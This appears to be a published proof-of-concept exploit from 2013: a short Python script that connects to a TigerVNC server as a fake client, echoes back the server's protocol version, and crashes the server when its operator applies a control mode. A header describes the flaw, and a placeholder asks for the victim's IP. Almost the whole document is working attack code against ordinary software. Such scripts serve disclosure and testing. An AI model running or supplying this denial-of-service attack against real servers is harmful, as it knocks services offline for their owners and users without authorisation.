#!/usr/bin/env python #================================================================# # [+] Title: TigerVNC Server Remote DoS Vulnerability # # [+] Discovered: 28/07/2013 # # [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ # # [+] Author: Z3r0n3 - Independent Security Researcher # # [+] Contact: z3r0n3@mail.com # # [+] Overview: # # A remote attacker can crash TigerVNC server by creating # # a fake client. after registring the client, any control # # the server try to do (View-only, Full control...) on the # # client can bring the server down (No one play with clients!) # #================================================================# import socket, sys; def SrvRecv(): global srvmsg; srvmsg=client.recv(1024); print("[<-] Srv: ", srvmsg); host="localhost"; # Put Victim IP here port=5900; print("[+] Creating socket..."); client=socket.socket(socket.AF_INET, socket.SOCK_STREAM); try: print("[+] Trying to connect with TigerVNC server..."); client.connect((host,port)); except socket.error: print("[!] Can't connect..."); client.close() sys.exit() print("[x] Connected..."); SrvRecv() client.send(srvmsg) # srvmsg="RFB XXX.XXX" print("""[x] Go to TigerVNC server and click on Full control to obtain a full crash""") x=input("[x] Don't press anything till the server is down"); client.close();